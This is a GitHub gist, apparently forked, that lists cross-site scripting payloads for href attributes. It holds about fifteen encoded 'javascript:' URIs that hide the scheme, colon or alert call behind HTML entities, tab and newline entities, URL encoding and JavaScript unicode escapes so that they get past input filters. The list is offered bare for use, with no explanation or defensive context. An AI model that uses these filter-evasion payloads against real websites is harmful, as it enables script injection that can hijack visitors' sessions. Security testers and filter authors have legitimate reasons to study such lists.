Skip to content

Instantly share code, notes, and snippets.

@Hack404-007

Hack404-007/href_bypass.html

Forked from xsuperbug/href_bypass.html
Created December 7, 2023 09:40
Show Gist options
  • Save Hack404-007/49085deb3a46817fda1d30f2c9781560 to your computer and use it in GitHub Desktop.
Save Hack404-007/49085deb3a46817fda1d30f2c9781560 to your computer and use it in GitHub Desktop.
Download ZIP
XSS payloads for href
Raw
href_bypass.html
<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()
<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)
javascript&#x3A;alert()
<!-- alert -->
#HTML entities/encode:
javascript:alert&lpar;&rpar;
javascript:al&#x65;rt``
#url encoding:
javascript:alert%60%60
javascript:x='%27-alert(1)-%27';
javascript:%61%6c%65%72%74%28%29
#JS unicode
javascript:a\u006Cert``"
javascript:\u0061\u006C\u0065\u0072\u0074``
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment